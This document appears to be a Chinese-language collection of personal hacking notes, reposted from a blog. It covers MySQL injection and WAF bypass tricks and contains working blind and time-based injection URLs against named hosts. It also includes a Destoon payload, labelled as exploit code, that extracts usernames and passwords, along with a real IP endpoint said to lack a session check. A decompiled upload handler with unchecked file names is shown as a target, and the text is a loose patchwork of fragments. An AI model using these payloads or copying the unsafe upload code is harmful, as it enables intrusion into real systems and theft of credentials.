本文共 10485 字,大约阅读时间需要 34 分钟。
mysql注入: \ 反斜杠的奥秘 slecet from ,char,取代where 关键字绕过的奥秘 多次过滤的奥秘:2,3次注入;update更新管理员 jsp图片马: 在F盘百度网盘有下载 桌面也有文件夹有 Java && .Net代码审计知识回顾: http://www.wooyun.org/bugs/wooyun-2014-053099 302跳转的大问题;小贺那个jsp并没有泄漏这些信息. http://58.214.247.138:8888/vacc/document/downdoc.do?docu_id=2 downloaddocument没有SESSION http://www.wooyun.org/bugs/wooyun-2010-061078 ' or[字段名字]<db_name()-- //关键字的绕过 【.NET小科普之一】数据库信息在哪儿 http://drops.wooyun.org/tips/975 http://blog.163.com/hero_213/blog/static/3989121420085267561179/ mapping.findForward->struts-config获取标签fail. HttpSession session = request.getSession(); String userid = (String)session.getAttribute("usersplatformuserid"); String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312"); if ((name == null) || ("".equals(name))) { return mapping.findForward("fail"); } nopted++;文件查找;整个目录查找class xxx 或者:public ServiceResponse private ServiceResponse public class ServiceResponse 搜索upload 这是upload的 import com.jwx.jfa.dto.ServiceRequest; import com.jwx.jfa.dto.ServiceResponse; import com.jwx.jfa.dto.ServiceResponse.ServiceCode; import com.jwx.jfa.web.BaseAction; import com.jwx.nipm.vaccine.dto.DocumentDTO; import com.jwx.nipm.vaccine.util.VaccineIdentity; import java.io.File; import java.io.FileOutputStream; import java.util.Iterator; import java.util.List; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import org.apache.commons.fileupload.DiskFileUpload; import org.apache.commons.fileupload.FileItem; import org.apache.struts.action.ActionForm; import org.apache.struts.action.ActionForward; import org.apache.struts.action.ActionMapping; 这是download的 import com.jwx.jfa.dto.ServiceRequest; import com.jwx.jfa.dto.ServiceResponse; import com.jwx.jfa.dto.ServiceResponse.ServiceCode; import com.jwx.jfa.log.JfaLogger; import com.jwx.jfa.web.BaseAction; import com.jwx.nipm.vaccine.dto.DocumentDTO; import com.jwx.nipm.vaccine.util.DateUtil; import com.jwx.nipm.vaccine.util.VaccineIdentity; import java.io.File; import java.io.FileInputStream; import java.util.Map; import javax.servlet.ServletOutputStream; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.apache.commons.logging.Log; import org.apache.struts.action.ActionForm; import org.apache.struts.action.ActionForward; import org.apache.struts.action.ActionMapping; Linux环境upload package com.jwx.nipm.vaccine.web.document; import com.jwx.jfa.dto.ServiceRequest; import com.jwx.jfa.dto.ServiceResponse; import com.jwx.jfa.dto.ServiceResponse.ServiceCode; import com.jwx.jfa.web.BaseAction; import com.jwx.nipm.vaccine.dto.DocumentDTO; import com.jwx.nipm.vaccine.util.VaccineIdentity; import java.io.File; import java.io.FileOutputStream; import java.util.Iterator; import java.util.List; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import org.apache.commons.fileupload.DiskFileUpload; import org.apache.commons.fileupload.FileItem; import org.apache.struts.action.ActionForm; import org.apache.struts.action.ActionForward; import org.apache.struts.action.ActionMapping; public class UploadDocumentAction extends BaseAction { public ActionForward execute(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response) throws Exception { try { ServiceRequest serviceRequest = generateRequest(request); serviceRequest.setIdentity(new VaccineIdentity()); serviceRequest.setRequestedCommandID("documentCommand"); serviceRequest.setParameter("action", "upload"); //action=upload 这样? HttpSession session = request.getSession(); String userid = (String)session.getAttribute("usersplatformuserid"); //获取session usersplatformuserid的值 String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312"); //获取name的值 if ((name == null) || ("".equals(name))) { return mapping.findForward("fail"); } String fileStore = "document\\"; File store = new File(fileStore); if (!store.exists()) store.mkdir(); DiskFileUpload fu = new DiskFileUpload(); fu.setSizeThreshold(1073741824); List fileItems = fu.parseRequest(request); //解析你request过来的值 Iterator it = fileItems.iterator(); String fileName = null; long fileSize = 0L; byte[] content = null; while (it.hasNext()) { FileItem fi = (FileItem)it.next(); String field; if (fi.isFormField()) { field = fi.getFieldName().toUpperCase(); //把你的文件名全部大写 } else { fileName = fi.getName(); //获取文件名 fileSize = fi.getSize(); //获取文件大小 if (fileSize > 1048576L) return mapping.findForward("fail"); content = fi.get(); } } if ((fileName == null) || (fileName.trim().equals(""))) throw new Exception("No file be selected!"); fileName = fileName.substring(fileName.lastIndexOf('\\')); FileOutputStream os = new FileOutputStream(fileStore + File.separator + fileName, false); //File.separator 在 UNIX 系统上,此字段的值为 '/';在 Microsoft Windows 系统上,它为 '\'。 os.write(content); os.close(); DocumentDTO document = new DocumentDTO(); document.setDocu_adder(Integer.valueOf(userid)); document.setDocu_title(fileName.substring(fileName.lastIndexOf('\\') + 1)); document.setDocu_size(Integer.toString((int)Math.floor((fileSize + 1023L) / 1024L))); serviceRequest.setCurrentRequestObject(document); ServiceResponse serviceResponse = processRequest(serviceRequest); if (serviceResponse.getServiceCode() == ServiceResponse.ServiceCode.SUCCESS) { return mapping.findForward("success"); } return mapping.findForward("fail"); } catch (Exception e) { e.printStackTrace(); }return mapping.findForward("fail"); } } mysql语法: select-1; select+1; select{x 1}; select.`1`.a; select.``.schema_name from information_schema.schemata; http://rile.gou.gg/search?query=1%27>(select.``.schema_name from (select.``.schema_name,if(ascii(mid((select * from test.flag),1,1)) =102,(benchmark(5000000,sha(1))),1) from information_schema.schemata)x)%23 http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,0)%23 http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,1)%23 select * from corp where corp_id in (1,2,(if(1=1,3,2))) group by concat(version(),floor(rand(0)*2)) having min(0); 于是我们可以使用corp_id=1 and corp_name= 'xxxx'的形式最后获取corp_name的值 按道理类似的使用uname = ‘admin’ and upass = 'xxx'的方式获取pass的值 但是这里得靠字典将pass的字段爆破出来 http://zone.wooyun.org/content/23796 multipart/form-data PHP和Java通用的WAF绕过方法 http://zone.wooyun.org/content/24143 /*select*/SELECT`password`from `destoon_member` /*select*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1 GROUP BY + HAVING 是可以帮助我们定位的。 ### 字符猜解的绕过技巧 程序中过滤了很多猜解字符串需要的函数例如:substring/substr/left...但是好像忘记了right和mid? code 区域 sql = mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 ) 找到字符以后,需要对字符串进行转换。这方面,程序对ascii、hex、ord、char进行了过滤,但是CONV呢? code 区域 CONV(mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 ),16,10)=16 技巧一:select.``.password from destoon_member 技巧二:select!1,password from destoon_member mysql> SELECT LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1)); SELECT MID('username',3,1); +---------------------------------------------------------------+ | LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1)) | +---------------------------------------------------------------+ | e | +---------------------------------------------------------------+ 1 row in set +---------------------+ | MID('username',3,1) | +---------------------+ | e | +---------------------+ 1 row in set mysql> 拆分字符串之后,我们试着把字符串转为10进制。conv与括号之间加入注释符,依然是可以使用的。 code 区域 mysql> select conv/**/('ad',16,10); +----------------------+ | conv/**/('ad',16,10) | +----------------------+ | 173 | +----------------------+ 1 row in set ## 漏洞利用代码 猜解destoon_member里的username。 code 区域 (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT 0,13) 这个是转换后的代码,依然可以执行: code 区域 (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) 漏洞证明: 我们提交的原语句为 code 区域 (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) 过滤后的语句为 code 区域 (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) 以下为测试SQL语句的可执行性 code 区域 mysql> select (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223); +---------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------+ | (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) | +---------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------+ | 0 | +---------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------+ 1 row in set mysql> select (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,13); +---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------+ | (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,13) | +---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------+ | 1 | +---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------+ 1 row in set转载地址:http://rdmnn.baihongyu.com/